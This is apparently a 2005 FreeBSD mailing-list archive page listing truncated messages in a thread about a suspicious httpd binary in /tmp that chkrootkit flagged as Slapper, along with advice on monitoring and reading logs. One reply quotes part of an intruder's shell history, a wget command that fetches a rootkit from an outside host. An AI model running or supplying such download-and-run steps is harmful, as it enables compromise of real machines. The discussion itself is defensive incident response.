Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Oliver Leitner
on my system (ie OpenSSL > / PHP register_globals)? > > I've been monitoring this server from a port that mirrors its traffic > using Ethereal, and all seems to be okay now. I also cvsuped -Rr my > apache+mod_ssl install. > > Thanks, > Bret > > -Original Messag

RE: httpd in /tmp - Sound advice sought

2005-02-09 Thread Bret Walker
PROTECTED] On Behalf Of Oliver Leitner Sent: Wednesday, February 09, 2005 8:48 AM To: Bret Walker; freebsd-questions@freebsd.org Subject: Re: httpd in /tmp - Sound advice sought I know a certain hacking group who is trying to run their trojan as httpd, I discovered that info through some shell accoun

Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Oliver Leitner
I know a certain hacking group who is trying to run their trojan as httpd, I discovered that info through some shell account I am running, that has tried to start this rootkit on our machine. Here's a short view from the shell's history: - wget geocities.com/setan_maya/taek.t

Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Redmond Militante
Sent: Tuesday, February 08, 2005 2:21 PM > To: Bret Walker > Subject: Re: httpd in /tmp - Sound advice sought > > > [Tue, Feb 08, 2005 at 01:43:36PM -0600] > This one time, at band camp, Bret Walker said: > > > I do read it, but not every day (weekends, especially).

Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Redmond Militante
> > > > Bret > > > > > > > > -Original Message- > > From: [EMAIL PROTECTED] > > [mailto:[EMAIL PROTECTED] On Behalf Of Mark A. > > Garcia > > Sent: Tuesday, February 08, 2005 9:57 AM > > To: Bret Walker > > Cc: freebs

Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Redmond Militante
og/messages every day. Do you do that? > Bret > > > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Mark A. Garcia > Sent: Tuesday, February 08, 2005 9:57 AM > To: Bret Walker > Cc: freebsd-questions@freebsd.org > Subjec

Re: httpd in /tmp - Sound advice sought

2005-02-08 Thread Mark A. Garcia
Bret Walker wrote: Last night, I ran chkrootkit and it gave me a warning about being infected with Slapper. Slapper exploits vulnerabilities in OpenSSL up to version 0.96d or older on Linux systems. I have only run 0.97d. The file that set chkrootkit off was httpd which was located in /tmp. /tm

httpd in /tmp - Sound advice sought

2005-02-08 Thread Bret Walker
Last night, I ran chkrootkit and it gave me a warning about being infected with Slapper. Slapper exploits vulnerabilities in OpenSSL up to version 0.96d or older on Linux systems. I have only run 0.97d. The file that set chkrootkit off was httpd which was located in /tmp. /tmp is always mounted